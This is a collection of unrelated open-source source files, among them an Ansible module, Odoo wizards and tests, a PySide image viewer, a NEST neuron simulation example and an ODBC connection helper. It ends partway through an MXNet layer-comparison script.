# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: fail
short_description: Fail with custom message
description:
- This module fails the progress with a custom message. It can be
useful for bailing out when a certain condition is met using C(when).
version_added: "0.8"
options:
msg:
description:
- The customized message used for failing execution. If omitted,
fail will simply bail out with a generic message.
required: false
default: "'Failed as requested from task'"
author: "Dag Wieers (@dagwieers)"
'''
EXAMPLES = '''
# Example playbook using fail and when together
- fail: msg="The system may not be provisioned according to the CMDB status."
when: cmdb_status != "to-be-staged"
'''
| gpl-3.0 |
vivisect/synapse | synapse/tools/pushfile.py | 1 | 1334 | import os
import sys
import argparse
import synapse.telepath as s_telepath
import synapse.lib.output as s_output
def getArgParser():
p = argparse.ArgumentParser()
p.add_argument('cortex', help='telepath URL for a target cortex')
p.add_argument('filenames', nargs='+', help='files to upload')
p.add_argument('--tags', help='comma separated list of tags to add to the nodes')
return p
def main(argv, outp=None):
if outp is None: # pragma: no cover
outp = s_output.OutPut()
p = getArgParser()
opts = p.parse_args(argv)
core = s_telepath.openurl(opts.cortex)
tags = []
if opts.tags:
for tag in opts.tags.split(','):
tags.append(tag)
if tags:
outp.printf('adding tags: %r' % (tags,))
for path in opts.filenames:
with open(path, 'rb') as fd:
base = os.path.basename(path)
node = core.formNodeByFd(fd, name=base)
core.addTufoTags(node, tags)
iden = node[1].get('file:bytes')
size = node[1].get('file:bytes:size')
name = node[1].get('file:bytes:name')
outp.printf('file: %s (%d) added (%s) as %s' % (base, size, iden, name))
core.fini() # Shut down the proxy
if __name__ == '__main__': # pragma: no cover
sys.exit(main(sys.argv[1:]))
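# Example invocation (editor-added; the cortex URL, file name, and tags are
# hypothetical):
#   python -m synapse.tools.pushfile tcp://cortex.host:47322/core report.pdf \
#       --tags=foo.bar,baz.faz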
| apache-2.0 |
StefanRijnhart/odoomrp-wip | account_treasury_forecast/wizard/wiz_create_invoice.py | 31 | 2577 | # -*- encoding: utf-8 -*-
##############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
import openerp.addons.decimal_precision as dp
from openerp import models, fields, api
class WizCreateInvoice(models.TransientModel):
_name = 'wiz.create.invoice'
_description = 'Wizard to create invoices'
partner_id = fields.Many2one("res.partner", string="Partner")
journal_id = fields.Many2one("account.journal", string="Journal",
domain=[("type", "=", "purchase")])
description = fields.Char(string="Description")
amount = fields.Float(string="Amount",
digits_compute=dp.get_precision('Account'))
line_id = fields.Many2one("account.treasury.forecast.line.template",
string="Payment")
@api.one
def button_create_inv(self):
invoice_obj = self.env['account.invoice']
res_inv = invoice_obj.onchange_partner_id('in_invoice',
self.partner_id.id)
values = res_inv['value']
values['name'] = ('Treasury: ' + self.description + '/ Amount: ' +
str(self.amount))
values['reference'] = ('Treasury: ' + self.description + '/ Amount: ' +
str(self.amount))
values['partner_id'] = self.partner_id.id
values['journal_id'] = self.journal_id.id
values['type'] = 'in_invoice'
invoice_id = invoice_obj.create(values)
self.line_id.write({'invoice_id': invoice_id.id, 'paid': 1,
'journal_id': self.journal_id.id,
'partner_id': self.partner_id.id,
'amount': self.amount})
return {'type': 'ir.actions.act_window_close'}
| agpl-3.0 |
FedoraScientific/salome-paravis | src/PV_SWIG/paravis.py | 1 | 3020 | # Copyright (C) 2010-2014 CEA/DEN, EDF R&D
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : [email protected]
#
# File : paravis.py
# Module : PARAVIS
#
import os
import PARAVIS
import SALOME
import SALOME_Session_idl
import SALOMEDS
import SALOME_ModuleCatalog
from omniORB import CORBA
from time import sleep
from salome import *
myORB = None
myNamingService = None
myLifeCycleCORBA = None
myNamingService = None
myLocalStudyManager = None
myLocalStudy = None
myLocalParavis = None
myDelay = None
mySession = None
## Initialization of paravis server
def Initialize(theORB, theNamingService, theLifeCycleCORBA, theStudyManager, theStudy, theDelay) :
global myORB, myNamingService, myLifeCycleCORBA, myLocalStudyManager, myLocalStudy
global mySession, myDelay
myDelay = theDelay
myORB = theORB
myNamingService = theNamingService
myLifeCycleCORBA = theLifeCycleCORBA
myLocalStudyManager = theStudyManager
while mySession == None:
mySession = myNamingService.Resolve("/Kernel/Session")
mySession = mySession._narrow(SALOME.Session)
mySession.GetInterface()
myDelay = theDelay
sleep(myDelay)
myLocalParavis = myLifeCycleCORBA.FindOrLoadComponent("FactoryServer", "PARAVIS")
myLocalStudy = theStudy
myLocalParavis.SetCurrentStudy(myLocalStudy)
myLocalParavis.ActivateModule()
return myLocalParavis
def ImportFile(theFileName):
"Import a file of any format supported by ParaView"
myParavis.ImportFile(theFileName)
def createFunction(theName):
"Create function - constructor of Paravis object"
def MyFunction():
return myParavis.CreateClass(theName)
return MyFunction
def createConstructors():
"Create constructor functions according to list of extracted classes"
g = globals()
aClassNames = myParavis.GetClassesList();
for aName in aClassNames:
g[aName] = createFunction(aName)
## Initialize of a PARAVIS interface
myParavis = Initialize(orb, naming_service,lcc,myStudyManager,myStudy, 2)
## Initialize constructor functions
createConstructors()
## Initialize Paravis static objects
vtkSMObject = vtkSMObject()
vtkProcessModule = vtkProcessModule()
vtkPVPythonModule = vtkPVPythonModule()
vtkSMProxyManager = vtkSMProxyManager()
| lgpl-2.1 |
viktorradnai/screenwarp | utils/create_chessboard.py | 1 | 2170 | #!/usr/bin/python
import cv2
import wand.image
import wand.color
import wand.drawing
import sys
import logging
import argparse
logger = logging.getLogger(__name__)
def parse_cmdline():
parser = argparse.ArgumentParser(description='''
Create a black-and-white chessboard image sized for the target screen.'''
)
parser.add_argument('-v', '--verbose', action='store_true', help="Enable verbose output")
parser.add_argument('-q', '--quiet', action='store_true', help="Output errors only")
parser.add_argument('-W', '--width', type=int, help="Target screen width. This will be the width of the output image.", default=1920)
parser.add_argument('-H', '--height', type=int, help="Target screen height. This will be the height of the output image.", default=1080)
parser.add_argument('-c', '--cols', type=int, help="Number of squares per column", default=16)
parser.add_argument('-r', '--rows', type=int, help="Number of squares per row", default=9)
parser.add_argument('filename', help="Image file")
args = parser.parse_args()
if args.verbose: loglevel = logging.DEBUG
elif args.quiet: loglevel = logging.ERROR
else: loglevel = logging.INFO
logging.basicConfig(level=loglevel, format='%(asctime)s %(levelname)s %(message)s')
return args
def main():
args = parse_cmdline()
screen_width = args.width
screen_height = args.height
square_width = screen_width // args.cols  # integer division keeps pixel-exact squares
square_height = screen_height // args.rows
image = wand.image.Image(width=screen_width, height=screen_height, background=wand.color.Color('#fff'))
with wand.drawing.Drawing() as draw:
draw.fill_color = wand.color.Color('#000')
for r in range(args.rows):
for c in range(args.cols):
if not (c + r) % 2:
continue
x = square_width * c
y = square_height * r
logger.debug("%s %s %s %s", x, y, square_width, square_height)
draw.rectangle(x, y, width=square_width, height=square_height)
draw.draw(image)
image.save(filename=args.filename)
exit(0)
# call main()
if __name__ == '__main__':
main()
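# Example invocation (editor-added; the output filename is illustrative):
#   ./create_chessboard.py -W 1920 -H 1080 -c 16 -r 9 chessboard.png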
| gpl-3.0 |
lmregus/Portfolio | python/design_patterns/env/lib/python3.7/site-packages/IPython/utils/dir2.py | 3 | 2232 | # encoding: utf-8
"""A fancy version of Python's builtin :func:`dir` function.
"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import inspect
import types
def safe_hasattr(obj, attr):
"""In recent versions of Python, hasattr() only catches AttributeError.
This catches all errors.
"""
try:
getattr(obj, attr)
return True
except:
return False
def dir2(obj):
"""dir2(obj) -> list of strings
Extended version of the Python builtin dir(), which does a few extra
checks.
This version is guaranteed to return only a list of true strings, whereas
dir() returns anything that objects inject into themselves, even if they
are later not really valid for attribute access (many extension libraries
have such bugs).
"""
# Start building the attribute list via dir(), and then complete it
# with a few extra special-purpose calls.
try:
words = set(dir(obj))
except Exception:
# TypeError: dir(obj) does not return a list
words = set()
if safe_hasattr(obj, '__class__'):
words |= set(dir(obj.__class__))
# filter out non-string attributes which may be stuffed by dir() calls
# and poor coding in third-party modules
words = [w for w in words if isinstance(w, str)]
return sorted(words)
def get_real_method(obj, name):
"""Like getattr, but with a few extra sanity checks:
- If obj is a class, ignore everything except class methods
- Check if obj is a proxy that claims to have all attributes
- Catch attribute access failing with any exception
- Check that the attribute is a callable object
Returns the method or None.
"""
try:
canary = getattr(obj, '_ipython_canary_method_should_not_exist_', None)
except Exception:
return None
if canary is not None:
# It claimed to have an attribute it should never have
return None
try:
m = getattr(obj, name, None)
except Exception:
return None
if inspect.isclass(obj) and not isinstance(m, types.MethodType):
return None
if callable(m):
return m
return None
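# Minimal illustration of the two helpers above (editor-added; the class is
# hypothetical, built only to demonstrate the canary check):
def _demo():
    class Proxy(object):
        _ipython_canary_method_should_not_exist_ = True
        def method(self):
            pass
    assert 'method' in dir2(Proxy())                    # always plain strings
    assert get_real_method(Proxy(), 'method') is None   # canary rejects proxies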
| mit |
Symphonia/Searcher | ImageView.py | 1 | 4861 | from PySide import QtGui, QtCore
import sys, os
class ImageView(QtGui.QWidget):
def __init__(self,imagelist,parent = None):
super(ImageView,self).__init__(parent)
self.imagesize = None
self.mode = ''
self.imageList = imagelist[0]
self.index = imagelist[1]
self.title_label = QtGui.QLabel(self)
self.imagesizelabel = QtGui.QLabel(self)
self.cursizelabel = QtGui.QLabel(self)
self.image_label = QtGui.QLabel(self)
self.image_label.setBackgroundRole(QtGui.QPalette.Base)
self.image_label.setSizePolicy(QtGui.QSizePolicy.Ignored,QtGui.QSizePolicy.Ignored)
self.image_label.setScaledContents(True)
self.installEventFilter(self)
CloseWindowAction = QtGui.QAction(self)
CloseWindowAction.setShortcut("Ctrl+W")
CloseWindowAction.triggered.connect(self.close)
self.addAction(CloseWindowAction)
self.scrollarea = QtGui.QScrollArea(self)
self.scrollarea.setBackgroundRole(QtGui.QPalette.Dark)
self.scrollarea.setWidget(self.image_label)
hbox = QtGui.QHBoxLayout()
hbox.addWidget(self.imagesizelabel)
hbox.addWidget(self.title_label)
hbox.addWidget(self.cursizelabel)
hbox.setContentsMargins(3,0,3,0)
qbox = QtGui.QVBoxLayout(self)
qbox.addLayout(hbox)
qbox.addWidget(self.scrollarea)
qbox.setContentsMargins(0,5,0,0)
info = QtCore.QFileInfo(self.imageList[self.index])
self.title_label.setText(info.fileName())
self.title_label.setAlignment(QtCore.Qt.AlignCenter)
self.imagesizelabel.setAlignment(QtCore.Qt.AlignLeft)
self.cursizelabel.setAlignment(QtCore.Qt.AlignRight)
self.setMinimumHeight(10)
self.setMinimumWidth(10)
self.setWindowTitle('Image Viewer')
self.setWindowFlags(QtCore.Qt.FramelessWindowHint)
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
self.setGeometry(10,10,500,400)
self.open(self.imageList[self.index])  # show the image at the starting index
self.show()
def open(self,image_path):
if image_path:
image = QtGui.QImage(image_path)
if image.isNull():
QtGui.QMessageBox.information(self,"Image View","Cannot load %s." %image_path)
return
self.image_label.setPixmap(QtGui.QPixmap.fromImage(image))
self.scrollarea.setWidgetResizable(True)
self.imagesize = image.size()
self.updateTitle()
def eventFilter(self,object,event):
if event.type() == QtCore.QEvent.KeyRelease:
if event.key() == QtCore.Qt.Key_Left:
if self.index ==0: self.index = len(self.imageList)
self.index-=1
self.open(self.imageList[self.index])
if event.key() == QtCore.Qt.Key_Right:
if self.index >= len(self.imageList)-1: self.index = -1  # wrap to the first image
self.index+=1
self.open(self.imageList[self.index])
if event.key() == QtCore.Qt.Key_W:
self.resize(500,400)
if event.key() == QtCore.Qt.Key_R:
if self.imagesize.height() > QtGui.QDesktopWidget().availableGeometry().height():
ratio = QtGui.QDesktopWidget().availableGeometry().height() / self.imagesize.height()
self.resize(int(self.imagesize.width()*ratio),int(self.imagesize.height()*ratio))
else:
self.resize(self.imagesize.width(),self.imagesize.height())
if event.key() == QtCore.Qt.Key_E:
self.move(self.pos().x(),0)
ratio = QtGui.QDesktopWidget().availableGeometry().height() / self.imagesize.height()
self.resize(int(self.imagesize.width()*ratio),int(self.imagesize.height()*ratio))
self.updateTitle()
if event.key() == QtCore.Qt.Key_Escape:
self.close()
if event.type() == QtCore.QEvent.MouseButtonPress:
if event.pos().x() < self.size().width() -20:
self.diff = event.globalPos() - self.frameGeometry().topLeft()
self.mode = 'drag'
else:
self.mode = 'resize'
if event.type() == QtCore.QEvent.MouseMove:
if self.mode == 'drag':
self.move(event.globalPos()-self.diff)
else:
self.resize(event.pos().x(),event.pos().y())
self.updateTitle()
return False
def updateTitle(self):
info = QtCore.QFileInfo(self.imageList[self.index])
self.imagesizelabel.setText(str(self.imagesize.width()) +','+ str(self.imagesize.height()) + ' ->')
self.title_label.setText(info.fileName())
self.cursizelabel.setText('<- ' + str(self.size().width()) + ',' + str(self.size().height()))
def mousePressEvent(self,event):
print(event.buttons())
if event.buttons() == QtCore.Qt.LeftButton:
if event.pos().x() < self.size().width() -20:
self.diff = event.globalPos() - self.frameGeometry().topLeft()
self.mode = 'drag'
else:
self.mode = 'resize'
def mouseMoveEvent(self,event):
if event.buttons() == QtCore.Qt.LeftButton:
if self.mode == 'drag':
self.move(event.globalPos()-self.diff)
else:
self.resize(event.pos().x(),event.pos().y())
# def main():
# app = QtGui.QApplication(sys.argv)
# imageview = ImageView()
# sys.exit(app.exec_())
# if __name__ == '__main__':
# main()
| mit |
hdinsight/hue | desktop/core/ext-py/lxml-3.4.4/src/lxml/html/tests/test_frames.py | 20 | 1557 | import unittest, sys
from lxml.tests.common_imports import make_doctest, doctest
import lxml.html
from lxml.html import html_parser, XHTML_NAMESPACE
class FrameTest(unittest.TestCase):
def test_parse_fragments_fromstring(self):
parser = lxml.html.HTMLParser(encoding='utf-8', remove_comments=True)
html = """<frameset>
<frame src="main.php" name="srcpg" id="srcpg" frameborder="0" rolling="Auto" marginwidth="" marginheight="0">
</frameset>"""
etree_document = lxml.html.fragments_fromstring(html, parser=parser)
self.assertEqual(len(etree_document), 1)
root = etree_document[0]
self.assertEqual(root.tag, "frameset")
frame_element = root[0]
self.assertEqual(frame_element.tag, 'frame')
def test_parse_fromstring(self):
parser = lxml.html.HTMLParser(encoding='utf-8', remove_comments=True)
html = """<html><frameset>
<frame src="main.php" name="srcpg" id="srcpg" frameborder="0" rolling="Auto" marginwidth="" marginheight="0">
</frameset></html>"""
etree_document = lxml.html.fromstring(html, parser=parser)
self.assertEqual(etree_document.tag, 'html')
self.assertEqual(len(etree_document), 1)
frameset_element = etree_document[0]
self.assertEqual(len(frameset_element), 1)
frame_element = frameset_element[0]
self.assertEqual(frame_element.tag, 'frame')
def test_suite():
loader = unittest.TestLoader()
return loader.loadTestsFromModule(sys.modules[__name__]) | apache-2.0 |
Silmathoron/nest-simulator | pynest/examples/if_curve.py | 5 | 5195 | # -*- coding: utf-8 -*-
#
# if_curve.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""IF curve example
----------------------
This example illustrates how to measure the I-F curve of a neuron.
The program creates a small group of neurons and injects a noisy current
:math:`I(t) = I_mean + I_std*W(t)`
where :math:`W(t)` is a white noise process.
The program systematically drives the current through a series of values in
the two-dimensional `(I_mean, I_std)` space and measures the firing rate of
the neurons.
In this example, we measure the I-F curve of the adaptive exponential
integrate and fire neuron (``aeif_cond_exp``), but any other neuron model that
accepts current inputs is possible. The model and its parameters are
supplied when the IF_curve object is created.
"""
import numpy
import nest
import shelve
###############################################################################
# Here we define which model and the neuron parameters to use for measuring
# the transfer function.
model = 'aeif_cond_exp'
params = {'a': 4.0,
'b': 80.8,
'V_th': -50.4,
'Delta_T': 2.0,
'I_e': 0.0,
'C_m': 281.0,
'g_L': 30.0,
'V_reset': -70.6,
'tau_w': 144.0,
't_ref': 5.0,
'V_peak': -40.0,
'E_L': -70.6,
'E_ex': 0.,
'E_in': -70.}
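# Parameter units follow the usual NEST conventions: capacitances in pF,
# conductances in nS, voltages in mV, currents in pA and times in ms.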
class IF_curve():
t_inter_trial = 200. # Interval between two successive measurement trials
t_sim = 1000. # Duration of a measurement trial
n_neurons = 100 # Number of neurons
    n_threads = 4         # Number of threads to run the simulation
def __init__(self, model, params=False):
self.model = model
self.params = params
self.build()
self.connect()
def build(self):
#######################################################################
# We reset NEST to delete information from previous simulations
# and adjust the number of threads.
nest.ResetKernel()
nest.SetKernelStatus({'local_num_threads': self.n_threads})
#######################################################################
# We set the default parameters of the neuron model to those
# defined above and create neurons and devices.
if self.params:
nest.SetDefaults(self.model, self.params)
self.neuron = nest.Create(self.model, self.n_neurons)
self.noise = nest.Create('noise_generator')
self.spike_detector = nest.Create('spike_detector')
def connect(self):
#######################################################################
# We connect the noisy current to the neurons and the neurons to
# the spike detectors.
nest.Connect(self.noise, self.neuron, 'all_to_all')
nest.Connect(self.neuron, self.spike_detector, 'all_to_all')
def output_rate(self, mean, std):
self.build()
self.connect()
#######################################################################
# We adjust the parameters of the noise according to the current
# values.
self.noise.set(mean=mean, std=std, start=0.0, stop=1000., origin=0.)
# We simulate the network and calculate the rate.
nest.Simulate(self.t_sim)
        # Convert the spike count to a mean rate in spikes/s per neuron
        # (t_sim is in ms, hence the factor of 1000).
        rate = self.spike_detector.n_events * 1000. / (1. * self.n_neurons * self.t_sim)
return rate
def compute_transfer(self, i_mean=(400.0, 900.0, 50.0),
i_std=(0.0, 600.0, 50.0)):
#######################################################################
        # We loop through all possible combinations of `(I_mean, I_std)`
# and measure the output rate of the neuron.
self.i_range = numpy.arange(*i_mean)
self.std_range = numpy.arange(*i_std)
self.rate = numpy.zeros((self.i_range.size, self.std_range.size))
nest.set_verbosity('M_WARNING')
for n, i in enumerate(self.i_range):
print('I = {0}'.format(i))
for m, std in enumerate(self.std_range):
self.rate[n, m] = self.output_rate(i, std)
transfer = IF_curve(model, params)
transfer.compute_transfer()
###############################################################################
# After the simulation is finished we store the data into a file for
# later analysis.
with shelve.open(model + '_transfer.dat') as dat:
dat['I_mean'] = transfer.i_range
dat['I_std'] = transfer.std_range
dat['rate'] = transfer.rate
| gpl-2.0 |
Eficent/odoomrp-wip | stock_quant_valuation/tests/test_stock_quant_valuation.py | 10 | 2798 | # -*- coding: utf-8 -*-
# (c) 2016 Ainara Galdona - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
import openerp.tests.common as common
from openerp import fields
class TestStockQuantValuation(common.TransactionCase):
def setUp(self):
super(TestStockQuantValuation, self).setUp()
self.quant_model = self.env['stock.quant']
self.hist_model = self.env['stock.history']
self.location_model = self.env['stock.location']
self.product = self.env.ref('product.product_product_34')
self.location = self.location_model.search([('usage', '=',
'internal')], limit=1)
def test_quant_valuation(self):
self.product.sudo().write({'cost_method': 'real',
'standard_price': 20,
'manual_standard_cost': 35})
quant = self.quant_model.create(
{'product_id': self.product.id,
'cost': 20,
'location_id': self.location.id,
'qty': 5})
self.assertEqual(quant.manual_value, (35 * 5),
"Incorrect Manual Value for quant.")
self.assertEqual(quant.real_value, (20 * 5),
"Incorrect Real Value for quant.")
def test_stock_history(self):
hist_line = self.hist_model.search([], limit=1)
hist_line.product_id.sudo().manual_standard_cost = 40
self.assertEqual(hist_line.manual_value, (hist_line.quantity * 40),
"Incorrect Manual Value for history line.")
self.assertEqual(hist_line.real_value,
(hist_line.quantity * hist_line.price_unit_on_quant),
"Incorrect Real Value for history line.")
def test_stock_history_read_group(self):
gfields = ['product_id', 'location_id', 'move_id', 'date', 'source',
'quantity', 'inventory_value', 'manual_value', 'real_value']
groupby = ['product_id']
domain = [('date', '<=', fields.Date.today())]
res = self.hist_model.read_group(
domain=domain, fields=gfields, groupby=groupby, offset=0,
limit=None, orderby=False, lazy=True)
if res:
line = res[0]
line_domain = line.get('__domain', domain)
group_lines = self.hist_model.search(line_domain)
sum_real = sum([x.real_value for x in group_lines])
sum_manual = sum([x.manual_value for x in group_lines])
self.assertEqual(line['real_value'], sum_real,
"Real value not correct sum.")
self.assertEqual(line['manual_value'], sum_manual,
"Manual value not correct sum.")
| agpl-3.0 |
L3nzian/AutoPermit | ap_connections.py | 1 | 7082 | #import pyodbc
import odbc
import _winreg
import ConfigParser
config_file = 'AutoPermit.ini'
def get_config_dict(config_file, section):
"""
Reads a config file
:param config_file: a config file usable by ConfigParser
:param section: a section in the config file
    :return: a dictionary of the section's entries
"""
dict1 = {}
config = ConfigParser.ConfigParser()
config.optionxform = str # Override optionxform so that keys remain case-sensitive
config.read(config_file)
options = config.options(section)
for option in options:
try:
dict1[option] = config.get(section, option)
if dict1[option] == -1:
print 'not an option'
except:
print("exception on %s!" % option)
dict1[option] = None
return dict1
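# Example (hypothetical AutoPermit.ini contents, for illustration only):
#   [odbc_connections]
#   Dmlr_DB = DSN=Dmlr_DB;Trusted_Connection=Yes
# get_config_dict('AutoPermit.ini', 'odbc_connections') would then return
# {'Dmlr_DB': 'DSN=Dmlr_DB;Trusted_Connection=Yes'}.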
def get_odbc_connection_string(con_string):
"""
:param con_string: Name of the odbc connection
:return: odbc connection name/string from config_file
"""
odbc_connections = get_config_dict(config_file, 'odbc_connections')
return odbc_connections[con_string]
#print get_odbc_connection_string("DMMESDEConnection")
# def MakeConnection():
# try:
# strKeyPath = "SOFTWARE\ODBC\ODBC.INI\ODBC Data Sources"
# odbckey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath)
# except Exception as e:
# pass
# try:
# strValueName = "Dmlr_DB"
# strValue = "SQL Server"
# _winreg.SetValueEx(odbckey, strValueName, 0, _winreg.REG_SZ, strValue)
# except:
# pass
# try:
# strKeyPath = "SOFTWARE\ODBC\ODBC.INI\Dmlr_DB"
# valKey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath)
# strValueName = "Database"
# strValue = "dmlr"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Driver"
# strValue = "C:\WINDOWS\System32\SQLSRV32.dll"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Server"
# strValue = "wsq00796"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Trusted_Connection"
# strValue = "Yes"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# except:
# pass
# try:
# _winreg.CloseKey(valKey)
# except:
# pass
# try:
# strValueName = "DMMESDEConnection"
# strValue = "SQL Server"
# _winreg.SetValueEx(odbckey, strValueName, 0, _winreg.REG_SZ, strValue)
# except:
# pass
# try:
# strKeyPath = "SOFTWARE\ODBC\ODBC.INI\DMMESDEConnection"
# valKey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath)
# strValueName = "Database"
# strValue = "Ep"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Driver"
# strValue = "C:\WINDOWS\System32\SQLSRV32.dll"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Server"
# strValue = "wsq00796"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Trusted_Connection"
# strValue = "Yes"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# except:
# pass
# try:
# _winreg.CloseKey(valKey)
# except:
# pass
# try:
# strValueName = "WaterQuality"
# strValue = "SQL Server"
# _winreg.SetValueEx(odbckey, strValueName, 0, _winreg.REG_SZ, strValue)
# except:
# pass
# try:
# strKeyPath = "SOFTWARE\ODBC\ODBC.INI\WaterQuality"
# valKey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath)
# strValueName = "Database"
# strValue = "WaterQuality"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Driver"
# strValue = "C:\WINDOWS\System32\SQLSRV32.dll"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Server"
# strValue = "DMMESDE"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Trusted_Connection"
# strValue = "Yes"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# except:
# pass
# try:
# _winreg.CloseKey(valKey)
# except:
# pass
# try:
# strValueName = "H2O"
# strValue = "SQL Server"
# _winreg.SetValueEx(odbckey, strValueName, 0, _winreg.REG_SZ, strValue)
# except:
# pass
# try:
# strKeyPath = "SOFTWARE\ODBC\ODBC.INI\H2O"
# valKey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath)
# strValueName = "Database"
# strValue = "H2OSpatial"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Driver"
# strValue = "C:\WINDOWS\System32\SQLSRV32.dll"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Server"
# strValue = "DMMESDE"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Trusted_Connection"
# strValue = "Yes"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# except:
# pass
# try:
# _winreg.CloseKey(valKey)
# except:
# pass
# try:
# _winreg.CloseKey(odbckey)
# except:
# pass
# try:
# conn = odbc.odbc("Dmlr_DB")
# conn2 = odbc.odbc("WaterQuality")
# conn3 = odbc.odbc("DMMESDEConnection")
# except:
# try:
# conn = odbc.odbc("DSN=Dmlr_DB2;UID=ags_service;PWD=Welcome1234")
# conn2 = odbc.odbc("DSN=WaterQuality2;UID=wq_guest;PWD=wq_guest")
# conn3 = odbc.odbc("DSN=DMMESDEConnection2;UID=ags_service;PWD=Welcome1234")
# except:
# conn = 1
# conn2 = 1
# conn3 = 1
# connList = [conn, conn2, conn3]
# return connList
#
#
# def get_ep_cursor():
# con = pyodbc.connect('Trusted_Connection=yes',
# driver='{SQL Server}',
# server='wsq00796',
# database='EP')
# return con.cursor()
#
#
# def get_dmlr_cursor():
# con = pyodbc.connect('Trusted_Connection=yes',
# driver='{SQL Server}',
# server='wsq00796',
# database='dmlr')
# return con.cursor()
#
#
# def get_wq_cursor():
# con = pyodbc.connect('Trusted_Connection=yes',
# driver='{SQL Server}',
# server='dmmesde',
# database='WaterQuality')
# return con.cursor()
| gpl-2.0 |
luoyetx/mxnet | example/ssd/tools/caffe_converter/compare_layers.py | 54 | 14536 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Test converted models layer by layer
"""
import os
import argparse
import logging
import mxnet as mx
import cv2
import numpy as np
logging.basicConfig(level=logging.INFO)
def read_image(img_path, image_dims=None, mean=None):
"""
Reads an image from file path or URL, optionally resizing to given image dimensions and
subtracting mean.
:param img_path: path to file, or url to download
:param image_dims: image dimensions to resize to, or None
:param mean: mean file to subtract, or None
:return: loaded image, in RGB format
"""
import urllib
filename = img_path.split("/")[-1]
if img_path.startswith('http'):
urllib.urlretrieve(img_path, filename)
img = cv2.imread(filename)
else:
img = cv2.imread(img_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
if image_dims is not None:
img = cv2.resize(img, image_dims) # resize to image_dims to fit model
img = np.rollaxis(img, 2) # change to (c, h, w) order
img = img[np.newaxis, :] # extend to (n, c, h, w)
if mean is not None:
mean = np.array(mean)
if mean.shape == (3,):
mean = mean[np.newaxis, :, np.newaxis, np.newaxis] # extend to (n, c, 1, 1)
img = img.astype(np.float32) - mean # subtract mean
return img
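# Minimal usage sketch (file name and mean values are illustrative only):
#   img = read_image('cat.jpg', image_dims=(224, 224), mean=[123.68, 116.779, 103.939])
# 'img' is then a (1, 3, 224, 224) float32 array in RGB order, mean-subtracted.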
def _ch_dev(arg_params, aux_params, ctx):
"""
Changes device of given mxnet arguments
:param arg_params: arguments
:param aux_params: auxiliary parameters
:param ctx: new device context
